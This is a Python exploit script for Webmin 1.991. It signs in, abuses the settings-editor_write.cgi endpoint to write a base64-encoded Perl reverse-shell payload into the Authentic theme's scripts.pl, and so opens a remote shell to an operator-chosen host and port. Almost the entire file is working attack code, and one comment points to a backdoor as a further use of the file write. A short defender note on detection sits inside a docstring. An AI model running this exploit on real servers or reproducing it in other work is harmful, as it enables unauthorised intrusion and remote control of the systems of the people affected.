#!/usr/bin/python3
# Webmin version 1.991
# "safemode" user privesc / RCE V1s3r1on & esp0xdeadbeef
# Thanks to Raj Chowdhury for suppressing errors in the https certs
import requests
import random
import os
import base64
import warnings
# One shared session: the Webmin 'sid' cookie it collects on login is reused
# by every later request in this script.
s = requests.Session()
# Silence every warning, including urllib3's InsecureRequestWarning that each
# verify=False request below would otherwise print.
warnings.simplefilter('ignore')
def go_to_homepage(url: str) -> str:
    """GET *url* on the shared session and return the response body.

    Certificate verification is disabled (verify=False), so a self-signed
    or mismatched TLS certificate is accepted without complaint.
    """
    response = s.get(url, verify=False)
    return response.text
def sign_in(url: str, username: str, password: str) -> tuple[str, dict[str, str]]:
    """Log in through session_login.cgi and return (body, {'sid': cookie}).

    The ``sid`` value is read back from the shared session's cookie jar, not
    from this response; ``s.cookies['sid']`` raises KeyError when the jar
    holds no ``sid`` cookie after the POST (for example when the login did
    not produce one).
    """
    credentials = {
        "user":username,
        "pass":password
    }
    # Built but never sent: the POST below does not pass ``headers``, so the
    # request goes out with requests' default User-Agent.
    headers = {
        "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
    }
    r = s.post(
        f"{url}/session_login.cgi",
        data = credentials,
        verify=False,
        cookies = {}
    )
    # Session-scoped cookie, handed back so callers can pass it explicitly.
    cookies = {
        'sid': s.cookies['sid']
    }
    return r.text, cookies
def navigate_to_theme(url: str, r, sid: str) -> str:
    """POST to tconfig.cgi on the shared session and return the body.

    ``r`` is never read. The ``headers`` and ``cookies`` dicts below are
    constructed but not passed to ``s.post``, so the request carries only
    the session's own cookies and requests' default headers. main() does
    not call this function.
    """
    # Unused: see docstring.
    headers = {
        "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
        "Referer" : f"{url}/",
        "Origin" : url,
        "X-Pjax-Url" : f"{url}/tconfig.cgi",
        "X-Pjax-Container" : "[data-dcontainer]",
        "X-No-Links" : "1",
        "X-Requested-With" : "XMLHttpRequest"
    }
    # Unused: see docstring.
    cookies = {'sid': sid}
    r = s.post(f"{url}/tconfig.cgi", verify=False)
    return r.text
def reverse_shell(url: str, cookies: dict[str, str], target_ip = 'localhost', target_port = 4444) -> str:
    """Write a shell command into the Authentic theme's scripts.pl via
    settings-editor_write.cgi and report whether the write was accepted.

    Returns 'exploit was succesfull' when the endpoint answers 302 and
    'exploit was failed' otherwise; the status code is the only success
    signal, the response body is not inspected.

    Defender note: the observable artifact is an authenticated POST to
    settings-editor_write.cgi whose ``file`` field names a path under
    /etc/webmin/ and whose ``data`` field is a ``system(...)`` call piping
    base64 into ``sh``. Alerting on that request shape and on writes to
    that directory is the natural detection point.
    """
    # Perl connect-back one-liner; target_ip and target_port are spliced in
    # as plain text, no quoting or validation.
    payload_str = '''perl -e 'use Socket;$i="''' + str(target_ip) + '''";$p=''' + str(target_port) + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};' '''
    # The one-liner is base64-encoded here and decoded on the server side by
    # the 'base64 -d | sh' pipeline embedded in the written Perl system() call.
    payload = 'system("echo ' + base64.b64encode(payload_str.encode()).decode() + ' | base64 -d | sh")'
    print(f'writing payload: \n{payload}')
    headers = {'Referer': url}
    # the file location could be an arbitrary file write (think about a backdoor or something like this).
    multipart_form_data = {
        "file": '/etc/webmin/authentic-theme/scripts.pl',
        'data': payload
    }
    # Redirects are not followed so a 302 from the write endpoint reaches the
    # status check below instead of being resolved to the redirect target.
    with s.post(
        url=f'{url}/settings-editor_write.cgi',
        headers = headers,
        cookies = cookies,
        files=multipart_form_data,
        allow_redirects=False
    ) as r:
        if r.status_code == 302:
            return 'exploit was succesfull'
        else:
            return 'exploit was failed'
def main() -> None:
    """Run the script end to end.

    Reads the module globals url, username, password, rev_host and rev_port,
    which the ``__main__`` block assigns from parse_args() before calling
    this function.
    """
    # Return value discarded; only the request itself is made.
    go_to_homepage(url)
    # ``result`` (the login response body) is never used.
    result, cookies = sign_in(url, username,password)
    print(reverse_shell(url, cookies, target_ip=rev_host, target_port=rev_port))
    # A second login after the write; the script does not state its purpose.
    sign_in(url, username,password)
def parse_args():
    """Parse the command line and return the argparse namespace.

    Every option is declared ``required=True``, so the ``default=`` values
    listed in the table are never applied; they are kept only to preserve
    the parser's definition as written.
    """
    import argparse
    # (flags, type, default) for each mandatory option, in declaration order.
    option_table = [
        (('-u', '--url'), str, "http://localhost:10000"),
        (('-pw', '--password'), str, 'TestUser'),
        (('-un', '--username'), str, 'Testing123!@#'),
        (('-rh', '--revhost'), str, 'localhost'),
        (('-rp', '--revport'), int, 4444),
    ]
    parser = argparse.ArgumentParser(prog="python3 exloit.py")
    for flags, value_type, fallback in option_table:
        parser.add_argument(
            *flags,
            required=True,
            type=value_type,
            default=fallback
        )
    return parser.parse_args()
if __name__ == '__main__':
    # The parsed options become module globals because main() and the
    # functions it calls read them by name rather than taking parameters.
    args = parse_args()
    url, rev_host, rev_port = args.url, args.revhost, args.revport
    username, password = args.username, args.password
    main()